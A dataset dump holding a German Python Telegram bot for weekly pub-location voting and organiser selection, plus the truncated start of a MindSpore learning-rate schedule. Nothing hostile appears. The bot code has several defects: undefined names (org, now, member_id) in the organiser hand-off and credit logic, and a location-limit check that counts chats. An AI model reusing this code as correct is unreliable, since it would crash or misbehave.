0\n"},"avg_line_length":{"kind":"number","value":30.5972222222,"string":"30.597222"},"max_line_length":{"kind":"number","value":148,"string":"148"},"alphanum_fraction":{"kind":"number","value":0.6699954607,"string":"0.669995"}}},{"rowIdx":46353,"cells":{"hexsha":{"kind":"string","value":"d5c1194ffec6d10f95aba586977b20adfc1cbf7c"},"size":{"kind":"number","value":26507,"string":"26,507"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"DummerStammtischBot.py"},"max_stars_repo_name":{"kind":"string","value":"VVEIRD/DummerStammtischBot"},"max_stars_repo_head_hexsha":{"kind":"string","value":"da0fd2dfe354a7fda5790023d199ddd9c5fbf76c"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-08-11T18:50:04.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-08-11T18:50:04.000Z"},"max_issues_repo_path":{"kind":"string","value":"DummerStammtischBot.py"},"max_issues_repo_name":{"kind":"string","value":"VVEIRD/DummerStammtischBot"},"max_issues_repo_head_hexsha":{"kind":"string","value":"da0fd2dfe354a7fda5790023d199ddd9c5fbf76c"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":1,"string":"1"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2019-05-16T06:28:36.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2019-05-16T06:28:36.000Z"},"max_forks_repo_path":{"kind":"string","value":"DummerStammtischBot.py"},"max_forks_repo_name":{"kind":"string","value":"VVEIRD/DummerStammtischBot"},"max_forks_repo_head_hexsha":{"kind":"string","value":"da0fd2dfe354a7fda5790023d199ddd9c5fbf76c"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-05-14T14:02:58.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2019-05-14T14:02:58.000Z"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n## Stammtischbot\n#\n# Macht Mittwochs eine Umfrage um herauszufinden wohin es zum Stammtisch gehen soll\n\nimport sys\nimport json\nimport sqlite3\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import MessageHandler, Filters\nimport datetime, time\nimport os\nimport logging\nfrom threading import Thread\nimport sys\n\nos.environ['TZ'] = 'Europe/Berlin'\n\nTIME_ZONE_MOD=+2\n\nTOKEN = sys.argv[1]\n\nDEFAULT_STAMMTISCHTAG = 3\n\nMAX_LOCATIONS = 30\n\nTAGE = {1 : \"Montag\", 2 : \"Dienstag\", 3 : \"Mittwoch\", 4 : \"Donnerstag\", 5 : \"Freitag\", 6 : \"Samstag\", 7 : \"Sonntag\"}\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\nconn = sqlite3.connect('DummerStammtischBot.db')\n\nc = conn.cursor()\n\ndef add_column_if_not_exists(c, table_name, new_column, new_column_type):\n tab_exists=False\n \n for row in c.execute('SELECT name FROM sqlite_master WHERE type= ? AND name = ?', ['table', table_name]):\n tab_exists=True\n \n if tab_exists:\n columns = [i[1] for i in c.execute('PRAGMA table_info(' + str(table_name) + ')')]\n if new_column not in columns:\n c.execute('ALTER TABLE ' + str(table_name) + ' ADD COLUMN ' + str(new_column) + ' ' + str(new_column_type))\n\n\n# Create table\nc.execute('''CREATE TABLE IF NOT EXISTS chatrooms\n (chat_id INTEGER,\n stammtischtag INTEGER,\n last_notified INTEGER,\n last_voting_notification INTEGER,\n last_organizer INTEGER\n )''')\n\n# Add last_organizer for existing databases\nadd_column_if_not_exists(c, 'chatrooms', 'last_organizer', 'INTEGER')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"locations\" (\n \"chat_id\" INTEGER,\n \"l_id\" INTEGER,\n \"location\" TEXT UNIQUE,\n PRIMARY KEY(\"chat_id\",\"l_id\")\n)''')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"votings\" (\n \"chat_id\" INTEGER,\n \"member_id\" INTEGER,\n \"member_name\" TEXT,\n \"location_id\" INTEGER,\n PRIMARY KEY(\"chat_id\",\"member_id\")\n)''')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"voiced\" (\n \"chat_id\" INTEGER,\n \"member_id\" INTEGER,\n PRIMARY KEY(\"chat_id\",\"member_id\")\n)''')\n\nc.execute('''CREATE TABLE IF NOT EXISTS \"member_credits\" (\n \"chat_id\" INTEGER,\n \"member_id\" INTEGER,\n \"credits\" INTEGER,\n PRIMARY KEY(\"chat_id\",\"member_id\")\n)''')\n\n\n\n######\n## Liste mit den Locations fuer den Stammtisch\n######\n\ndef load_locations():\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n locations = {}\n print('Lade Locations...')\n print('-----------------------------------')\n for row in c.execute('SELECT chat_id, l_id, location FROM locations'):\n if row[0] not in locations:\n print ('Chat ID: %s' % (str(row[0])))\n print('-----------------------------------')\n locations[row[0]] = []\n locations[row[0]].append((row[1], row[2]))\n print(u'Location hinzugefuegt: ID: %d, %d' % (row[0], row[1]) )\n conn.close()\n return locations\n\n# Lade Locations wenn die Datei fuer locations existiert\n\nlocations = load_locations()\n\n\n# Wenn keine Location existiert, erzeuge eine leere Liste\n\nif locations == None:\n locations = {}\n\n\n######\n## Liste mit den Chats die der Bot angehoert\n######\n\ndef load_chatrooms():\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n chatrooms = {}\n for row in c.execute('SELECT chat_id, stammtischtag, last_notified, last_voting_notification, last_organizer FROM chatrooms'):\n chatrooms[row[0]] = [row[1],row[2], row[3], row[4]]\n conn.close()\n return chatrooms\n\n# Lade chatrooms wenn die Datei fuer chatrooms existiert\n\nchatrooms = load_chatrooms()\n\n# Wenn keine Location existiert, erzeuge eine leere Liste\n\nif chatrooms == None:\n chatrooms = {}\n\nconn.commit()\nconn.close()\n\n######\n## Methoden fuer den Chatbot\n######\n\n# Fuehrt ein Query aus, liefert keine Daten zurueck\ndef execute_query(query, args):\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n c.execute(query, args)\n conn.commit()\n conn.close()\n\n# Fuert ein Query aus, liefert das Resultat als 2D-Array zurueck\ndef execute_select(query, args):\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n result = []\n for row in c.execute(query, args):\n result.append(row)\n conn.close()\n return result\n\n# Fuegt einen neuen Gruppenchat hinzu, in dem der Bot hinzugefuegt wurde\ndef add_chatroom(chat_id):\n if chat_id not in chatrooms:\n chatrooms[chat_id] = [DEFAULT_STAMMTISCHTAG, 0, 0]\n print('New chatroom: ' + str(chat_id))\n execute_query('INSERT INTO chatrooms (chat_id, stammtischtag, last_notified, last_voting_notification) VALUES (?, ?, 0, 0)', [chat_id, chatrooms[chat_id][0]])\n\n# Entfernt alle Daten ueber einen Gruppenchat, asu dem der Bot entfernt wurde\ndef remove_chatroom(chat_id):\n if chat_id in chatrooms:\n print('Removed from Chat: ' + str(chat_id))\n chatrooms.pop(chat_id, None)\n locations.pop(chat_id, None)\n execute_query('DELETE FROM chatrooms WHERE chat_id = ?', [chat_id])\n execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id])\n execute_query('DELETE FROM locations WHERE chat_id = ?', [chat_id])\n print('Removed from chatroom: %s' % chat_id)\n\ndef start(update, context):\n add_chatroom(update.message.chat.id)\n context.bot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\n\n# Prueft ob der User der Nachricht der Admin oder der Ersteller ist.\n# Bei beiden liefert er True zurueck\ndef has_admin(update, context):\n chat_id = update.message.chat.id\n user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id)\n is_admin = 'administrator' == user.status\n is_creator = 'creator' == user.status\n return is_admin or is_creator\n\n# Prueft ob der aufrufende Benutzer von einem Admin voice erhalten hat\n# Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen\ndef has_voice(update, context):\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n is_voiced = execute_select('SELECT 1 FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n return len(is_voiced) > 0 \n\n# Erteilt einem Benutzer Voice. Darf nur von Admins ausgefuehrt werden.\ndef voice(update, context):\n chat_id = update.message.chat.id\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Nur Admins können diese Funktion benutzen')\n return\n for mention in update.message.entities:\n if mention.user is not None:\n user_id = mention.user.id\n user_name = mention.user.first_name\n execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n execute_query('INSERT INTO voiced (chat_id, member_id) VALUES (?, ?)', [chat_id, user_id])\n update.message.reply_text(u'%s wurde authorisiert' % (user_name))\n\n# Entzieht einem User voice. Darf nur von einem Admin gemacht werden\ndef revoke(update, context):\n chat_id = update.message.chat.id\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Nur Admins können diese Funktion benutzen')\n return\n for mention in update.message.entities:\n if mention.user is not None:\n user_id = mention.user.id\n user_name = mention.user.first_name\n execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n update.message.reply_text(u'%s kann die erweiterten Funktionen nicht mehr nutzen' % (user_name))\n\n# Fuegt einen ort zu den Stammtischen hinzu. Darf nut von Usern mit voice oder Admins gemacht werden\ndef add_location(update, context):\n global locations\n add_chatroom(update.message.chat.id)\n chat_id = update.message.chat.id\n location = ' '.join(context.args).strip()\n is_admin = has_admin(update, context)\n is_voiced = has_voice(update, context)\n if not is_admin and not is_voiced:\n update.message.reply_text(u'Du hast keine Berechtigung einen Ort hinzuzufügen, frage einen Admin ob er dich dazu berechtigt.')\n return\n if chat_id not in locations:\n locations[chat_id] = []\n if location and location not in locations[chat_id] and len(locations) <= MAX_LOCATIONS:\n execute_query('''INSERT INTO locations (chat_id, l_id, location) VALUES (?, Ifnull((SELECT max(l_id)+1 FROM locations WHERE chat_id = ?), 1), ?)''', (chat_id, chat_id, location))\n locations = load_locations()\n update.message.reply_text('Das Ziel ' + location + u' wurde hinzugefügt')\n elif len(locations) > MAX_LOCATIONS:\n update.message.reply_text('Ihr habt das Limit von %s Locations erreicht, sorry!')\n\n# Listet alle Orte, die für den Stammtisch verfügbar sind, auf.\ndef list_locations(update, context):\n message = u'Folgende Stammtischziele stehen zur Verfügung:\\r\\n'\n if update.message.chat.id in locations:\n i = 1\n for loc in locations[update.message.chat.id]:\n message = message + str(loc[0]) + '. ' + loc[1] + '\\r\\n'\n i += 1\n context.bot.send_message(chat_id=update.message.chat_id, text=message)\n else:\n context.bot.send_message(chat_id=update.message.chat_id, text=u'Es gibt noch keine Stammtischziele, füge welche mit /add hinzu')\n\n# Loescht einen Ort. Darf nut von Admins gemacht werden\ndef del_location(update, context):\n global locations\n add_chatroom(update.message.chat.id)\n chat_id = update.message.chat.id\n location_id = int(' '.join(context.args).strip())\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Du hast keine Berechtigung einen Ort zu löschen, frage einen Admin ob den Ort für dich löscht.')\n return\n if chat_id not in locations:\n locations[chat_id] = []\n loc_exist = False\n loc_name = ''\n for loc in locations[chat_id]:\n if loc[0] == location_id:\n loc_exist = True\n loc_name = loc[1]\n break\n if location_id and loc_exist:\n execute_query('''DELETE FROM locations WHERE chat_id = ? AND l_id = ?''', (chat_id, location_id))\n locations = load_locations()\n update.message.reply_text('Das Ziel ' + str(location_id) + '. ' + loc_name + u' wurde gelöscht')\n else:\n update.message.reply_text('Die Location existiert nicht (mehr)!')\n\n# Setzt den Tag des Stammtisches. Davon hängt ab wann abgestimmt wird. Duerfen nur Admins machen.\ndef set_stammtischtag(update, context):\n chat_id = update.message.chat.id\n from_user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id)\n is_admin = has_admin(update, context)\n if not is_admin:\n update.message.reply_text(u'Du bist kein Admin, sorry!')\n return\n for arg in context.args:\n try:\n tag = int(arg)\n if chat_id in chatrooms and tag >= 1 and tag <= 7:\n chatrooms[chat_id] = tag\n execute_query('UPDATE chatrooms SET stammtischtag = ? WHERE chat_id = ?', [tag, chat_id])\n update.message.reply_text(u'Der Stammtischtag wurde auf %s gesetzt' % TAGE[tag])\n elif tag < 1 or tag > 7:\n update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son')\n except ValueError:\n update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son')\n\n\n# Event handler wenn der Bot einem Gruppenchat hinzugefuegt wird\ndef new_member(update, context):\n for member in update.message.new_chat_members:\n print(member)\n if member.username == 'DummerStammtischBot':\n add_chatroom(update.message.chat.id)\n context.bot.send_message(chat_id=update.message.chat_id, text=u'Hallo zusammen, ich bin eurem Chat beigetreten\\r\\nFolgende Befehl stehen euch zur Auswahl:\\r\\n /stammtischtag oder /st: Legt den Tag des Stammtischs fest\\r\\n /add: Ein Stammtischziel hinzufügen\\r\\n /list: Alle Stammtischziele anzeigen')\n else:\n update.message.reply_text(u'Hallo ' + member.username + ', willkommen am Stammtisch!')\n\n# Event handler wenn der Bot einem Gruppenchat entfernt wird\ndef left_member(update, context):\n member = update.message.left_chat_member\n print(member)\n if member.username == 'DummerStammtischBot':\n remove_chatroom(update.message.chat.id)\n\n\n# Zeigt alle verfuegbaren Funktionen an\ndef help(update, context):\n context.bot.send_message(chat_id=update.message.chat_id, text=u'''Ich bin der StammtischBot!\\r\\n\nFolgende Befhele stehen euch zur Auswahl:\n\n[Admins]\n /stammtischtag oder /st: Legt den Tag des Stammtischs fest\n /voice [1..x]: Der angegebene Benutzer kann die erweiterte Funktionen nutzen\n /revoke [1..x]: Entzieht den angegebenen Benutzern die Rechte auf die erweiterten funktionen.\n[Erweiterte Funktionen]\n /add: Ein Stammtischziel hinzufügen\n /del: Löscht einen Ort\n\n[Alle]\n /list: Alle Stammtischziele anzeigen\n /help: Diese Nachricht anzeigen\n /not_today: Der aktuelle Organisator kann die Orge eine Stunde nach der Entscheidung abgeben''')\n\n\n# Gibt aus, ob der Chat im Abstimmzeitraum befindet\ndef is_voting_time(chat_id, message_date):\n # Weekday of Message\n weekday = message_date.weekday()+1\n # Hour of message\n hour = message_date.hour+TIME_ZONE_MOD\n # Am Tag vor dem Stammtisch soll abgestimmt werden\n dayToNotifyAt = chatrooms[chat_id][0]-1\n # Zeitpunkt an dem das letztre Voting gestartet wurde\n lastNotified = chatrooms[chat_id][1]\n # Zeitpunkt an dem das letztre Voting beendet wurde\n lastVotingNotified = chatrooms[chat_id][2]\n # Wir wollen am Vortag zwischen 8 und 18 Uhr voten\n print('--------------------------------------------------')\n print('Check is voting time')\n print('--------------------------------------------------')\n print('Weekday: %d' % (weekday))\n print('Hour: %d' % (hour))\n print('Day to notify: %d' % (dayToNotifyAt))\n print('Last voting: %d' % (lastNotified))\n print('Last voting ended: %d' % (lastVotingNotified))\n print('Notify today: %s' % (str(dayToNotifyAt == weekday and hour >= 8 and hour < 18)))\n print('--------------------------------------------------')\n return dayToNotifyAt == weekday and hour >= 8 and hour < 18\n\n# Informiert den Chat ueber diverse Dinge\ndef notifier(context):\n for chat_id in chatrooms:\n now = int(time.time())\n weekday = datetime.datetime.today().weekday()+1\n hour = datetime.datetime.now().hour\n print('Hour: %s' % (hour))\n # Am Tag vor dem Stammtisch soll abgestimmt werden\n dayToNotifyAt = chatrooms[chat_id][0]-1\n # Zeitpunkt an dem das letztre Voting gestartet wurde\n lastNotified = chatrooms[chat_id][1]\n # Zeitpunkt an dem das letztre Voting beendet wurde\n lastVotingNotified = chatrooms[chat_id][2]\n # Wir wollen am Vortag installieren nur einmal pro Woche nach 8 Uhr\n if dayToNotifyAt == weekday and lastNotified+518400 < now and hour >= 8:\n print(\"Notifying %s\" % chat_id)\n execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id])\n message = u'Hallo, morgen ist wieder Stammtisch. Bitte voted bis heute um 18 Uhr, für ein Ziel.\\nWenn man voted muss man kommen, sonst gibts Haue!\\n\\n'\n if chat_id in locations:\n message += u'Folgende Stammtischziele stehen zur Verfügung:\\r\\n'\n for loc in locations[chat_id]:\n message += '%s. %s\\r\\n' % (loc[0],loc[1])\n message += u'\\nStimme mit 1 bis %s ab' % len(locations[chat_id])\n else:\n message += u'Leider gibt es noch keine Ziele. Füge welche mit /add hinzu'\n\n context.bot.send_message(chat_id=chat_id, text=message)\n execute_query('UPDATE chatrooms SET last_notified = ? WHERE chat_id = ?', [now, chat_id])\n chatrooms[chat_id][1] = now\n if dayToNotifyAt == weekday and lastVotingNotified+518400 < now and hour >= 18:\n last_organizer = chatrooms[chat_id][3]\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\\n\\n'\n i = 1\n for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]):\n message += '%s. %s (%s Stimmen)\\n' % (i, row[0], row[1])\n i += 1\n organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)' , [chat_id, chat_id, last_organizer]).fetchone()\n message += '\\n%s darf diese Woche den Stammtisch organisieren' % organisierer[0]\n org_member_id = organisierer[1]\n context.bot.send_message(chat_id=chat_id, text=message)\n execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id])\n # If User was never organizer, they get 4 credits\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, member_id])\n if len(credits) == 0:\n execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4])\n # Add a credit to the member\n execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id])\n chatrooms[chat_id][2] = now\n chatrooms[chat_id][3] = org_member_id\n\n# Abstimmfunktion, der benutzer muss nur eine valide Zahl in den Chat eintippen, damit er abstimmt.\n# Er wird vom Bot informiert, wenn er abgestimmt hat.\ndef vote(update, context):\n print('------------------------------------')\n print ('Voting...')\n print('------------------------------------')\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n user_name = update.message.from_user.first_name\n message_date = update.message.date\n print(u'%s hat mit %s abgestimmt' % (user_name, update.message.text))\n print('Is voting time: %s' % (str(is_voting_time(chat_id, message_date))))\n if chat_id in chatrooms and is_voting_time(chat_id, message_date):\n print ('Chatgroup is included')\n try:\n auswahl = int(update.message.text.strip())\n valid_selection = False\n for l in locations[chat_id]:\n if auswahl == l[0]:\n valid_selection = True\n if auswahl >= 1 and valid_selection:\n print('Auswahl ist vorhanden')\n execute_query('DELETE FROM votings WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n execute_query('INSERT INTO votings (chat_id, member_id, member_name, location_id) VALUES (?, ?, ?, ?)', [chat_id, user_id, user_name, auswahl])\n location = execute_select('SELECT location FROM locations WHERE chat_id = ? AND l_id = ?', [chat_id, auswahl])[0]\n print('Location ist %s' % (location[0]))\n update.message.reply_text(u'%s hat für %s gestimmt' % (update.message.from_user.first_name, location[0]))\n except ValueError:\n a = 0\n print('------------------------------------')\n\n# Prueft ob der aufrufende Benutzer genug credits zum aufrufen der ot_today funktion hat\n# Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen\ndef has_enought_member_credits(update, context):\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n # If User was never organizer, they get 4 credits\n if len(credits) == 0:\n execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4])\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n credits = credits.fetchone()[0]\n enougth_credits = False\n if credits >= 3:\n enougth_credits = True\n execute_query('UPDATE member_credits SET credits = credits-3 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id])\n return enougth_credits\n\n\n# Gibt aus, ob der /nottoday Befehl vom Organisator durchgeführt werden kann\ndef is_nottoday_time(chat_id, message_date):\n # Weekday of Message\n weekday = message_date.weekday()+1\n # Hour of message\n hour = message_date.hour\n # Am Tag vor dem Stammtisch soll abgestimmt werden\n dayToNotifyAt = chatrooms[chat_id][0]-1\n # Zeitpunkt an dem das letztre Voting gestartet wurde\n lastNotified = chatrooms[chat_id][1]\n # Zeitpunkt an dem das letztre Voting beendet wurde\n lastVotingNotified = chatrooms[chat_id][2]\n # Wir wollen am Vortag zwischen 8 und 18 Uhr voten\n return dayToNotifyAt == weekday and hour >= 18 and hour <= 19\n\n# Funktion wenn der Organisator heute NICHT organisieren will\ndef not_today(update, context):\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n user_name = update.message.from_user.first_name\n message_date = update.message.date\n if chat_id in chatrooms and is_nottoday_time(chat_id, message_date) and user_id == chatrooms[chat_id][3]:\n if has_enought_member_credits(update, context):\n update.message.reply_text(u'%s möchte heute nicht den Stammtisch organisieren, es wird ein neuer Organisator gewählt.' % (update.message.from_user.first_name) )\n last_organizer = chatrooms[chat_id][3]\n conn = sqlite3.connect('DummerStammtischBot.db')\n c = conn.cursor()\n message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\\n\\n'\n i = 1\n for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]):\n message += '%s. %s (%s Stimmen)\\n' % (i, row[0], row[1])\n i += 1\n organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)' , [chat_id, chat_id, last_organizer]).fetchone()\n message += '\\n%s darf diese Woche den Stammtisch organisieren' % org[0]\n org_member_id = org[1]\n context.bot.send_message(chat_id=chat_id, text=message)\n execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id])\n # If User was never organizer, they get 4 credits\n credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id])\n if len(credits) == 0:\n execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4])\n # Add a credit to the member\n execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id])\n chatrooms[chat_id][2] = now\n chatrooms[chat_id][3] = org_member_id\n else:\n update.message.reply_text(u'Du hast leider nicht genug Credits um die Organisation abzugeben!')\n elif chat_id in chatrooms and is_nottoday_time(chat_id, message_date):\n update.message.reply_text(u'Der Zeitraum die Organisation abzugeben ist leider schon vorbei!')\n elif chat_id in chatrooms and user_id != chatrooms[chat_id][3]:\n update.message.reply_text(u'Du Organisierst den Stammtisch heute gar nicht!')\n else:\n update.message.reply_text(u'Etwas ist schiefgegangen?!?!!?')\n\n######\n## Bot Stuff. Init, Mappen der handler/methoden\n######\n\nupdater = Updater(token=TOKEN, use_context=True)\ndispatcher = updater.dispatcher\njobqueue = updater.job_queue\n\nstart_handler = CommandHandler('start', start)\ndispatcher.add_handler(start_handler)\n\n# Job jede Minute\njob_minute = jobqueue.run_repeating(notifier, interval=600, first=20)\n\n# Fuegt eine Location zu den moeglichen Stammtischzielen hinzu\nadd_handler = CommandHandler('add', add_location)\ndispatcher.add_handler(add_handler)\n\n# Loescht eine Location\ndel_handler = CommandHandler('del', del_location)\ndispatcher.add_handler(del_handler)\n\n# Listet alle Stammtischzielen\nlist_handler = CommandHandler('list', list_locations)\ndispatcher.add_handler(list_handler)\n\n# Benutzer mehr Berechtigung geben\nvoice_handler = CommandHandler('voice', voice)\ndispatcher.add_handler(voice_handler)\n\n# Benutzer mehr Berechtigung geben\nrevoke_handler = CommandHandler('revoke', revoke)\ndispatcher.add_handler(revoke_handler)\n\n# Organisator gibt orga ab\nnot_today_handler = CommandHandler('not_today', not_today)\ndispatcher.add_handler(not_today_handler)\n\n# Setzt den Stammtischtag\nstammtischtag_handler = CommandHandler('stammtischtag', set_stammtischtag)\nst_handler = CommandHandler('st', set_stammtischtag)\ndispatcher.add_handler(stammtischtag_handler)\ndispatcher.add_handler(st_handler)\n\n# Hilfetext anzeigen\nhelp_handler = CommandHandler('help', help)\ndispatcher.add_handler(help_handler)\n\n# Eventhandler, wenn der Bot einem Chat hinzugefuegt wird\ndispatcher.add_handler(MessageHandler(Filters.status_update.new_chat_members, new_member))\n\n# Eventhandler, wenn der Bot aus einem Chat entfernt wird\ndispatcher.add_handler(MessageHandler(Filters.status_update.left_chat_member, left_member))\n\n# Echo handler\nvote_handler = MessageHandler(Filters.group, vote)\ndispatcher.add_handler(vote_handler)\n\nupdater.start_polling()\n\n# Allen chats sagen, dass der Bot Online ist\n#for chatid in chatrooms:\n# updater.bot.send_message(chat_id=int(chatid), text='Ich bin Online!')\n\nupdater.idle()\n"},"avg_line_length":{"kind":"number","value":44.3260869565,"string":"44.326087"},"max_line_length":{"kind":"number","value":312,"string":"312"},"alphanum_fraction":{"kind":"number","value":0.6740860905,"string":"0.674086"}}},{"rowIdx":46354,"cells":{"hexsha":{"kind":"string","value":"e66b64c090062fa4320308b0f75296dcc8e8c5a4"},"size":{"kind":"number","value":2436,"string":"2,436"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"official/cv/retinaface_resnet50/src/lr_schedule.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"official/cv/retinaface_resnet50/src/lr_schedule.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"official/cv/retinaface_resnet50/src/lr_schedule.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"learning rate schedule.\"\"\"\nimport math\nfrom .config import cfg_res50\n\n\ndef _linear_warmup_learning_rate(current_step, warmup_steps, base_lr, init_lr):\n lr_inc = (float(base_lr) - float(init_lr)) / float(warmup_steps)\n learning_rate = float(init_lr) + lr_inc * current_step\n return learning_rate\n\n\ndef _a_cosine_learning_rate(current_step, base_lr, warmup_steps, decay_steps):\n base = float(current_step - warmup_steps) / float(decay_steps)\n learning_rate = (1 + math.cos(base * math.pi)) / 2 * base_lr\n return learning_rate\n\n\ndef _dynamic_lr(base_lr, total_steps, warmup_steps, warmup_ratio=1 / 3):\n lr = []\n for i in range(total_steps):\n if i < warmup_steps:\n lr.append(_linear_warmup_learning_rate(i, warmup_steps, base_lr, base_lr * warmup_ratio))\n else:\n lr.append(_a_cosine_learning_rate(i, base_lr, warmup_steps, total_steps))\n\n return lr\n\n\ndef adjust_learning_rate(initial_lr, gamma, stepvalues, steps_pre_epoch, total_epochs, warmup_epoch=5):\n if cfg_res50['lr_type'] == 